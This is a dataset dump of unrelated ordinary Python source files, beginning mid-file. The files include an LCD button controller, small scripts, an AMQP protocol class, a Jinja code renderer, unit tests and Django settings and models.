self.buttonPressed(button[1]):\n\t\t\t\tif(self._light):\n\t\t\t\t\tself._sleeptimer = 50\n\t\t\t\t\tbutton[2]()\n\t\t\t\telse:\n\t\t\t\t\tself.turn_on()\n\n\t\t\t\tbreak\n\t\tsleep(0.1)\n\n\n\t# action for button up\n\tdef button_up(self):\n\t\tself._buttonsFunction['UP']()\n\t\tif(not self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\n\t\tself.update()\n\n\n\t# action for button down\n\tdef button_down(self):\n\t\tself._buttonsFunction['DOWN']()\n\t\tif(not self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\n\t\tself.update()\n\n\n\t# action for button left\n\tdef button_left(self):\n\t\tself._buttonsFunction['LEFT']()\n\n\n\t# action for button right\n\tdef button_right(self):\n\t\tself._buttonsFunction['RIGHT']()\n\n\n\t# action for button select\n\tdef button_select(self):\n\t\tif(self._isPlayermediaFocus):\n\t\t\tself._buttonsFunction = self._playeroptions.getActionButtons()\n\t\telse:\n\t\t\tself._buttonsFunction = self._playermedia.getActionButtons()\n\t\t\n\t\tself._isPlayermediaFocus = not(self._isPlayermediaFocus)\n\t\tself.update()\n\n\t# turn on lcd + backlight\n\tdef turn_on(self):\n\t\tself._light = True\n\t\tself._sleeptimer = 50\n\t\tself.backlight(self._colors[self._colorIndex][1])\n\t\tself.display()\n\n\n\t# turn off lcd + backlight\n\tdef turn_off(self):\n\t\tself._light = False\n\t\tself._sleeptimer = 0\n\t\tself._light = False\n\t\tself.backlight(self.OFF)\n\t\tself.noDisplay()\n\n\n\t# update the lcd display in function of the index page\n\tdef update(self):\n\t\ttext = \"\"\n\t\tself.clear()\n\n\t\tif(self._isPlayermediaFocus):\n\t\t\t(self._line1, self._line2) = self._playermedia.getText()\n\t\telse:\n\t\t\t(self._line1, self._line2) = self._playeroptions.getText()\n\t\t\n\t\tif(len(self._line1) > 16):\n\t\t\tself._scroller = Scroller(self._line1)\n\t\t\ttext = \"\\n\".join(( self.scroll(), self._line2 ))\n\t\telse:\n\t\t\ttext = \"\\n\".join(( self._line1, self._line2 ))\n\t\t\n\t\tself.message( text )\n\n\n\t\n\tdef refresh(self):\n\t\ttext = \"\"\n\t\tself.clear()\n\n\t\tif(self._isPlayermediaFocus):\n\t\t\tself._line2 = self._playermedia.getLine2()\n\t\telse:\n\t\t\tself._line2 = self._playeroptions.getLine2()\n\n\t\tif(len(self._line1) > 16):\n\t\t\ttext = \"\\n\".join(( self.scroll(), self._line2 ))\n\t\telse:\n\t\t\ttext = \"\\n\".join(( self._line1, self._line2 ))\n\t\t\n\t\tself.message( text )\n\t\n\n\n\tdef sleepTimerLess(self):\n\t\tself._sleeptimer -= 1\n\n\n\tdef getSleepTimer(self):\n\t\treturn self._sleeptimer\n\n\n\tdef 
scroll(self):\n\t\treturn self._scroller.scroll()\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\tfrom PlayerOptions import PlayerOptions\n\tfrom PlayerMedia import PlayerMedia\n\n\tplayermedia = PlayerMedia()\n\tplayoptions = PlayerOptions(playermedia)\n\tlcd = CharLCD(playermedia, playoptions)\n\n\ttry:\n\t\twhile True:\n\t\t\t# display message if backlight is on\n\t\t\tif lcd.getSleepTimer() < 0:\n\t\t\t\tlcd.turn_off()\t\n\t\t\telse:\n\t\t\t\tlcd.refresh()\n\t\t\t\tlcd.sleepTimerLess()\n\n\t\t\t# read button status\n\t\t\tlcd.action_button()\n\t\t\tsleep(0.2)\n\n\texcept KeyboardInterrupt:\n\t\tpass\n\n\tfinally:\n\t\tlcd.turn_off()\n","sub_path":"CharLCD.py","file_name":"CharLCD.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"584986732","text":"import sys\ninput = sys.stdin.readline\n\ns = input().rstrip()\nN = len(s)\ncnt=0\nfor i in range(len(s)-1):\n if s[i] != s[i+1]:\n cnt+=1\nif cnt%2:\n print(cnt//2+1)\nelse:\n print(cnt//2)","sub_path":"1439뒤집기.py","file_name":"1439뒤집기.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"488565540","text":"# https://tvax2.sinaimg.cn/large/006yt1Omgy1gbdu6ml01gj315o0ppb1w.jpg\n# https://tvax1.sinaimg.cn/large/006yt1Omgy1gbdtwie3fkj31e00xc1kx.jpg\nimport requests\nimport os\n\nurl = \"https://tvax2.sinaimg.cn/large/006yt1Omgy1gbdu6ml01gj315o0ppb1w.jpg\"\nroot = \"E://paper//\"\npath = root + url.split('/')[-1]\n\ntry:\n if not os.path.exists(root):\n os.mkdir(root)\n\n if not os.path.exists(path):\n r = requests.get(url=url)\n print(r.status_code)\n r.raise_for_status()\n with open(path, 'wb') as f:\n f.write(r.content)\n f.close()\n print(\"successful\")\n else:\n print(\"已存在\")\nexcept Exception as e:\n print(e)\n","sub_path":"Spider/spider/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"270551695","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# *{{ imports\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n# }}*\n\n# *{{ plot niceties\nmpl.rcParams['font.size'] = 16\nmpl.rcParams['xtick.major.pad'] = '10'\nmpl.rcParams['ytick.major.pad'] = '10'\n#plt.rc('text', usetex = True)\n#mpl.rcParams['text.latex.preamble'] = [r'\\usepackage{cmbright}']\n# }}*\n\n# test function to be plotted, params as args\ndef f(x, a, b):\n return (1.0/b)*np.cosh(a*x)\n\n# param initial values, plot values\na0, b0 = 1.0, 1.0\nx = np.arange(0, 5, 0.05)\n\n# plot setup\nax = plt.subplot(111)\nplt.subplots_adjust(left=0.15, bottom=0.25)\nl, = plt.plot(f(x, 1.0, 1.0))\n\n# *{{ slider setups\naxcolor = 'white'\nbmax = plt.axes([0.15, 0.15, 0.65, 0.03], axisbg=axcolor)\namax = plt.axes([0.15, 0.1, 0.65, 0.03], axisbg=axcolor)\n\nsb = Slider(bmax, r'$b$', 0.01, 1.0, valinit = b0, color = 'green')\nsa = Slider(amax, r'$a$', 0.1, 3.0, valinit = a0, color = 'red')\n\ndef update(val):\n l.set_ydata(f(x, sa.val, sb.val))\n\nsb.on_changed(update)\nsa.on_changed(update)\n# }}*\n\nplt.show()\n","sub_path":"1d_sliders.py","file_name":"1d_sliders.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624883689","text":"# Copyright 2015 Cisco Systems, Inc.\n# All rights reserved.\n#\n# Licensed 
under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\" twisted message queue protocol\nreference from https://github.com/pika/pika/blob/master/examples/twisted_service.py\n\"\"\"\n\nimport logging\n\nfrom pika import spec\nfrom pika.adapters import twisted_connection\nfrom twisted.internet.defer import inlineCallbacks\n\nPREFETCH_COUNT = 2\nLOG = logging.getLogger(__name__)\n\n\nclass PikaProtocol(twisted_connection.TwistedProtocolConnection):\n connected = False\n name = 'AMQP:Protocol'\n\n @inlineCallbacks\n def connected(self, connection):\n self.channel = yield connection.channel()\n yield self.channel.basic_qos(prefetch_count=PREFETCH_COUNT)\n self.connected = True\n for (exchange, routing_key, callback,) in self.factory.read_list:\n yield self.setup_read(exchange, routing_key, callback)\n\n self.send()\n\n @inlineCallbacks\n def read(self, exchange, routing_key, callback):\n \"\"\"Add an exchange to the list of exchanges to read from.\"\"\"\n if self.connected:\n yield self.setup_read(exchange, routing_key, callback)\n\n @inlineCallbacks\n def setup_read(self, exchange, routing_key, callback):\n \"\"\"This function does the work to read from an exchange.\"\"\"\n if not exchange == '':\n yield self.channel.exchange_declare(exchange=exchange, type='topic', durable=True, auto_delete=False)\n if not exchange == '':\n queue = yield self.channel.queue_declare(durable=False, exclusive=True, auto_delete=True)\n queue_name = queue.method.queue\n yield self.channel.queue_bind(queue=queue_name, exchange=exchange, routing_key=routing_key)\n else:\n queue = yield self.channel.queue_declare(queue=routing_key, durable=False, exclusive=True, auto_delete=True)\n queue_name = queue.fields[0]\n (queue, consumer_tag,) = yield self.channel.basic_consume(queue=queue_name, no_ack=True)\n d = queue.get()\n d.addCallback(self._read_item, queue, callback)\n d.addErrback(self._read_item_err)\n\n def _read_item(self, item, queue, callback):\n \"\"\"Callback function which is called when an item is read.\"\"\"\n d = queue.get()\n d.addCallback(self._read_item, queue, callback)\n d.addErrback(self._read_item_err)\n (channel, deliver, props, msg,) = item\n LOG.debug('%s (%s): %s', deliver.exchange, deliver.routing_key, repr(msg))\n callback(item)\n\n def _read_item_err(self, error):\n LOG.error(error)\n\n def send(self):\n \"\"\"If connected, send all waiting messages.\"\"\"\n if self.connected:\n while len(self.factory.queued_messages) > 0:\n (exchange, r_key, message,) = self.factory.queued_messages.pop(0)\n self.send_message(exchange, r_key, message)\n\n @inlineCallbacks\n def send_message(self, exchange, routing_key, msg):\n \"\"\"Send a single message.\"\"\"\n LOG.debug('%s (%s): %s', exchange, routing_key, repr(msg))\n yield self.channel.exchange_declare(exchange=exchange, type='topic', durable=True, auto_delete=False)\n prop = spec.BasicProperties(delivery_mode=2)\n try:\n yield self.channel.basic_publish(exchange=exchange, routing_key=routing_key, body=msg, properties=prop)\n except Exception as error:\n 
LOG.error('Error while sending message: %s', error)\n","sub_path":"yabgp/channel/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184325905","text":"class ApiMessageWrapper:\n error = None\n data = None\n currentStreet = None\n \n def __init__(self, error, currentStreet, data):\n self.error = error\n self.data = data\n self.currentStreet = currentStreet\n\n def getDic(self):\n return {\n \"error\": self.error,\n \"data\": self.data,\n \"currentStreet\": self.currentStreet\n }","sub_path":"brash/models/apiMessageWrapper.py","file_name":"apiMessageWrapper.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288302275","text":"import logging\nfrom blinker import Namespace\nimport functools\n\n\nlogger = logging.getLogger(\"persistpy\")\nsignal_namespace = Namespace()\n\n\ndef log_operation(coll, op, data=None, pk=None):\n logger.debug(\"collection=%s operation=%s data=%s _id=%s\" % (coll, op, data, pk))\n\n\ndef create_change_tracking_type(name, wrapped_type, methods):\n def make_tracked_method(method_name):\n method = getattr(wrapped_type, method_name)\n def tracked_method(self, *args, **kwargs):\n rv = method(self, *args, **kwargs)\n self.callback(self, method_name)\n return rv\n return tracked_method\n\n attrs = dict((m, make_tracked_method(m)) for m in methods)\n def init(self, callback, *args, **kwargs):\n wrapped_type.__init__(self, *args, **kwargs)\n self.callback = callback\n attrs[\"__init__\"] = init\n\n return type(name, (wrapped_type,), attrs)\n\n\n# ChangeTrackingList = create_change_tracking_type(\"TrackingList\", list, (\"__delitem__\",\n# \"__delslice__\", \"__iadd__\", \"__imul__\", \"__setitem__\", \"__setslice__\",\n# \"append\", \"extend\", \"insert\", \"pop\", \"remove\", \"reverse\", \"sort\"))\n\n# ChangeTrackingDict = create_change_tracking_type(\"TrackingDict\", dict, (\"__delitem__\",\n# \"__setitem__\", \"clear\", \"pop\", \"popitem\", \"setdefault\", \"update\"))\n\n\nChangeTrackingList = create_change_tracking_type(\"TrackingList\", list, (\n \"append\", \"extend\", \"insert\", \"pop\", \"remove\", \"reverse\", \"sort\"))\n\nChangeTrackingDict = create_change_tracking_type(\"TrackingDict\", dict, (\n \"clear\", \"pop\", \"popitem\", \"setdefault\", \"update\"))","sub_path":"persistpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601736761","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport os.path\nimport re\nimport typing\n\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom opentelemetry.semconv.model.semantic_convention import SemanticConventionSet\nfrom opentelemetry.semconv.model.utils import ID_RE\n\n\ndef 
to_doc_brief(doc_string: typing.Optional[str]) -> str:\n if doc_string is None:\n return \"\"\n doc_string = doc_string.strip()\n if doc_string.endswith(\".\"):\n return doc_string[:-1]\n return doc_string\n\n\ndef merge(list: typing.List, elm):\n return list.extend(elm)\n\n\ndef to_const_name(name: str) -> str:\n return name.upper().replace(\".\", \"_\").replace(\"-\", \"_\")\n\n\ndef to_camelcase(name: str, first_upper=False) -> str:\n first, *rest = name.replace(\"_\", \".\").split(\".\")\n if first_upper:\n first = first.capitalize()\n return first + \"\".join(word.capitalize() for word in rest)\n\n\nclass CodeRenderer:\n pattern = \"{{{}}}\".format(ID_RE.pattern)\n matcher = re.compile(pattern)\n\n parameters: typing.Dict[str, str]\n\n @staticmethod\n def from_commandline_params(parameters=None):\n if parameters is None:\n parameters = []\n params = {}\n if parameters:\n for elm in parameters:\n pairs = elm.split(\",\")\n for pair in pairs:\n (k, v) = pair.split(\"=\")\n params[k] = v\n return CodeRenderer(params)\n\n def __init__(self, parameters: typing.Dict[str, str]):\n self.parameters = parameters\n\n def get_data_single_file(\n self, semconvset: SemanticConventionSet, template_path: str\n ) -> dict:\n \"\"\"Returns a dictionary that contains all SemanticConventions to fill the template.\"\"\"\n data = {\n \"template\": template_path,\n \"semconvs\": semconvset.models,\n \"attributes\": semconvset.attributes(),\n }\n data.update(self.parameters)\n return data\n\n def get_data_multiple_files(self, semconv, template_path) -> dict:\n \"\"\"Returns a dictionary with the data from a single SemanticConvention to fill the template.\"\"\"\n data = {\"template\": template_path, \"semconv\": semconv}\n data.update(self.parameters)\n return data\n\n @staticmethod\n def setup_environment(env: Environment):\n env.filters[\"to_doc_brief\"] = to_doc_brief\n env.filters[\"to_const_name\"] = to_const_name\n env.filters[\"merge\"] = merge\n env.filters[\"to_camelcase\"] = to_camelcase\n\n @staticmethod\n def prefix_output_file(file_name, pattern, semconv):\n base = os.path.basename(file_name)\n dir = os.path.dirname(file_name)\n value = getattr(semconv, pattern)\n return os.path.join(dir, to_camelcase(value, True), base)\n\n def render(\n self,\n semconvset: SemanticConventionSet,\n template_path: str,\n output_file,\n pattern: str,\n ):\n file_name = os.path.basename(template_path)\n folder = os.path.dirname(template_path)\n env = Environment(\n loader=FileSystemLoader(searchpath=folder),\n autoescape=select_autoescape([\"\"]),\n )\n self.setup_environment(env)\n if pattern:\n for semconv in semconvset.models.values():\n output_name = self.prefix_output_file(output_file, pattern, semconv)\n data = self.get_data_multiple_files(semconv, template_path)\n template = env.get_template(file_name, data)\n template.globals[\"now\"] = datetime.datetime.utcnow()\n template.globals[\"version\"] = os.environ.get(\"ARTIFACT_VERSION\", \"dev\")\n template.stream(data).dump(output_name)\n else:\n data = self.get_data_single_file(semconvset, template_path)\n template = env.get_template(file_name, data)\n template.globals[\"now\"] = datetime.datetime.utcnow()\n template.globals[\"version\"] = os.environ.get(\"ARTIFACT_VERSION\", \"dev\")\n template.stream(data).dump(output_file)\n","sub_path":"semantic-conventions/src/opentelemetry/semconv/templating/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"586236395","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport time\nimport random\n\nimport json\nimport re\nimport sqlite3\nimport threading\nimport time\nfrom threading import Semaphore, Thread\n\nimport pymysql\n\nimport dbSettings\nimport requests\n\nbatchSize = 100000\n\n\ndef dbMoveOrder(batchFrom,db,cursor):\n sql = \"SELECT * FROM `order` where id between {} and {}\".format(batchFrom,batchFrom+batchSize)\n cursor.execute(sql)\n db.commit()\n results = cursor.fetchall()\n sql = \"INSERT IGNORE INTO `order_` (`house_id`, `fetch_date`, `order_date`, repeat_flag)\\\n VALUES (%s,%s,%s,%s);\"\n\n vals = []\n for row in results :\n fetch_date = row[\"fetch_date\"]\n order_date = row[\"order_date\"]\n house_id = row[\"house_id\"]\n repeat_flag = \"{}:{}\".format(house_id, order_date)\n vals.append(\n (house_id, fetch_date, order_date, repeat_flag))\n \n # print(vals)\n cursor.executemany(sql, vals)\n db.commit()\n\n\nif __name__ == \"__main__\":\n db = dbSettings.db_connect()\n cursor = db.cursor()\n\n sql = \"SELECT * FROM `order` order by id desc limit 1\"\n cursor.execute(sql)\n db.commit()\n numTotal = cursor.fetchall()[0][\"id\"]\n print(numTotal)\n\n start = 0\n # numTotal = 20000\n\n for batchFrom in range(start,numTotal,batchSize):\n print(batchFrom,batchFrom+batchSize,100*batchFrom/numTotal)\n dbMoveOrder(batchFrom,db,cursor)\n","sub_path":"airbnbSpider_scrapy/airbnbSpider/airbnbSpider/historyCode/moveOrder.py","file_name":"moveOrder.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106952459","text":"from PIL import Image\r\n# Используем функцию random для выбора картинки\r\nimport random\r\nnumber = random.random()\r\n# Функция отвечающая за вызов картинки\r\ndef show():\r\n if number > 0.5:\r\n img = Image.open('died.jpg')\r\n else:\r\n img = Image.open('safe.jpg')\r\n img.show()\r\nshow()\r\nprint(number)","sub_path":"died.py","file_name":"died.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613158812","text":"# 2. 
猜數字遊戲,猜心中想一個 0~7 之間的數字,然後回答問題\n# 用位元的方式 000 001\nans = 0\nprint(\"猜數字遊戲,猜心中想一個 0~7 之間的數字,然後回答問題\")\n\ntruefalse = \"輸入y或Y代表有,其他代表無:\"\n# 檢視2進位的第1位是否含1\nq1 = \"有沒有看到心中的數字:\\n\" + \\\n \"1,3,5,7 \\n\"\nnum = input(q1 + truefalse)\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 1\n# 檢視2進位的第2位是否含1\nq2 = \"有沒有看到心中的數字:\\n\" + \\\n \"2,3,6,7 \\n\"\nnum = input(q2 + truefalse)\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 2\n# 檢視2進位的第3位是否含1\nq3 = \"有沒有看到心中的數字:\\n\" + \\\n \"4,5,6,7 \\n\"\nnum = input(q3 + truefalse)\nprint(num)\nif num == \"y\" or num == \"Y\":\n ans += 4\nprint(\"讀者心中所想的數字是:\",ans)","sub_path":"Ch3_Control_Flow/補充/guessnumber.py","file_name":"guessnumber.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126716394","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport logging\n\nfrom unittest import TestCase\n\nfrom voluptuous import Invalid\n\nfrom udata.ext.harvest import filters\n\nlog = logging.getLogger(__name__)\n\n\nclass FiltersTest(TestCase):\n def test_boolean(self):\n true_values = ('1', 'on', 't', 'TRUE', 'true', 'y', 'yes', ' 1 ',\n ' tRuE ', True, 1, 2, -1)\n false_values = ('0', 'f', 'FALSE', 'false', 'n', 'no', 'off', ' 0 ',\n ' f ', False, 0)\n none_values = ('', ' ', None)\n\n for value in true_values:\n self.assertEqual(filters.boolean(value), True)\n\n for value in false_values:\n self.assertEqual(filters.boolean(value), False)\n\n for value in none_values:\n self.assertIsNone(filters.boolean(value))\n\n with self.assertRaises(Invalid):\n filters.boolean('vrai')\n\n def test_empty_none(self):\n empty_values = 0, '', [], {}\n non_empty_values = 'hello', ' hello '\n\n for value in empty_values:\n self.assertIsNone(filters.empty_none(value))\n\n for value in non_empty_values:\n self.assertEqual(filters.empty_none(value), value)\n\n def test_strip(self):\n self.assertEqual(filters.strip(' hello '), 'hello')\n self.assertIsNone(filters.strip(' '))\n\n def test_line_endings(self):\n self.assertEqual(filters.line_endings('hello\\r\\nworld!\\r '),\n 'hello\\nworld!\\n ')\n\n def test_hash(self):\n hashes = {\n 'md5': 'bd8668597bfba2d1843441d7199bea65',\n 'sha1': 'f2f0249827f501286b4713683e526d541d2cc7e2',\n 'sha256': ('c4373e1d81eb44882bf9ff539d0e5f'\n 'faf03a114abf9306591117d781966268f9')\n }\n\n for type, value in hashes.items():\n self.assertEqual(filters.hash(value),\n {'type': type, 'value': value})\n\n","sub_path":"udata_harvest/tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135834936","text":"# coding:utf-8\n\"\"\"\nDjango settings for cloud_web project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'l#*d(407-#-jhni$!(12(c*)rjy*6)&&m^*ty@16=kd9^tba!('\n\n# SECURITY WARNING: don't run with debug turned on in
production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #私有云app部分\n 'compute',\n 'network',\n 'utility',\n #账户管理 author:weios\n 'account',\n # 云硬盘 author:weios\n 'storage',\n # 快照\n 'snapshot',\n # 安全组\n 'security',\n #秘钥\n 'keypair',\n #监控\n 'monitors',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n # 'cloud_web.middlerware.PageOprtationMiddleWare',\n 'cloud_web.middlerware.BlockedIpMiddleware',\n)\n\nROOT_URLCONF = 'cloud_web.urls'\n\nWSGI_APPLICATION = 'cloud_web.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'HOST': '172.16.60.254',\n 'NAME': 'cloud_db',\n 'USER': 'clouduser',\n 'PASSWORD': 'clouduser123',\n 'PORT': '3306'\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh_CN'\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\").replace(\"\\\\\", \"/\"),\n # os.path.join(BASE_DIR, \"uploads\").replace('\\\\', '/'),\n)\n\n\n#日志文件配置\nimport logging\nlogging.basicConfig(\n level = logging.DEBUG,\n format='%(filename)s[line:%(lineno)d] %(levelname)s (%(asctime)s) %(message)s',\n datefmt='%H:%M:%S',\n)\n\n\n#私有云登录登出URL\n# LOGOUT_URL = \"/customer/logout/\"\n# LOGIN_URL = \"/customer/login/\"\n\n\n#模板目录\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, \"templates\"),\n)\n\n\n#请求过期时间\nTIMEOUT = 3\n\n\n# api的配置文件:\n# *主要是ip和端口的配置\n# 标注 :#说明\n# IP的命名 :服务名称(大写) + API_IP\n# PORT的命名 :服务名称(大写) + API_PORT\n# *可配置(IP和端口号组合):\n# IP+PORT :服务名称(大写) + API_IP_PORT\n\n#镜像服务uri\nIMAGE_ENDPOINT = 'http://172.16.60.201:9292'\n\n# \"\"\"云主机服务_API\"\"\"\nCUMPUTE_API_IP = '172.16.60.254'\n# CUMPUTE_API_IP = '172.16.60.254'\nCUMPUTE_API_PORT = 8102\n\n# \"\"\"网络_API\"\"\"\nNETWORK_API_IP = \"172.16.60.254\"\n# NETWORK_API_IP = \"172.16.60.254\"\nNETWORK_API_PORT = 8104\n\n# \"\"\"云硬盘_API\"\"\"\n\nCLOUDDISK_API_IP = \"127.0.0.1\"\n# CLOUDDISK_API_IP = \"172.16.60.254\"\nCLOUDISK_API_PORT = 8319\n\n# \"\"\"认证_API\"\"\"\n# ACCOUNT_API_IP = \"127.0.0.1\"\nACCOUNT_API_IP = \"172.16.60.254\"\nACCOUNT_API_PORT = 8219\n\n# \"\"\"秘钥_API\"\"\"\nKEYPAIR_API_IP = \"127.0.0.1\"\n# KEYPAIR_API_IP = \"172.16.60.254\"\nKEYPAIR_API_PORT = 8419\n\n# \"\"\"监控_API\"\"\"\nMONITOR_API_IP = \"127.0.0.1\"\n# MONITOR_API_IP = \"172.16.60.254\"\nMONITOR_API_PORT = 8519\n\n# \"\"\"安全组_API\"\"\"\nSECURITY_API_IP = \"127.0.0.1\"\n# SECURITY_API_IP = \"172.16.60.254\"\nSECURITY_API_PORT = 8419\n\n# \"\"\"快照_API\"\"\"\nSNAPSHOT_API_IP = \"127.0.0.1\"\n# SNAPSHOT_API_IP = \"172.16.60.254\"\n\nSNAPSHOT_API_PORT = 8319\n\n# \"\"\"安全组_API\"\"\"\n# SECURITYP_API_IP = '192.168.30.220'\n# 
SECURITYP_API_IP = '192.168.30.220'\n# SECURITYP_API_PORT = 8105\n","sub_path":"cloud_web/cloud_web/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"408105281","text":"CONFIG_OPTIONS = {\n    'server': {\n        'interface': '0.0.0.0',\n        'publish_port': 5051,\n        'return_port': 5050,\n        'cache_dir': '/var/cache/caster',\n        'config_dir': '/etc/caster',\n    },\n    'workers': {\n        'threads': 5,\n    },\n    'crypto': {\n        'key_dir': '/etc/caster/keys',\n        'keysize': 2048,\n        'encrypt_algo': 'AES',\n        'hash_algo': 'SHA256',\n        'pki_algo': 'RSA',\n    },\n    'logging': {\n        'log_dir': '/var/log/caster',\n        'file': 'server',\n        'log_level': 'DEBUG',\n        'out_level': 'ERROR',\n    },\n}\n","sub_path":"caster/server/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"401405149","text":"from datetime import datetime\n\nfrom django.db import models\n\n# Create your models here.\nfrom models.URL.models import URL\n\n\nclass Visitor(models.Model):\n\n    MOBILE = 1\n    DESKTOP = 2\n\n    DEVICES = (\n        (MOBILE, 'Mobile'),\n        (DESKTOP, 'Desktop'),\n    )\n    url = models.ForeignKey(URL, related_name='visitors', on_delete=models.CASCADE)\n    device = models.IntegerField(choices=DEVICES, default=DESKTOP)\n    browser = models.CharField(max_length=50)\n    # pass the callable, not its result, so the default is evaluated per row\n    date = models.DateTimeField(default=datetime.now)\n    ip = models.CharField(max_length=17, default='127.0.0.1')\n\n","sub_path":"models/visitor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
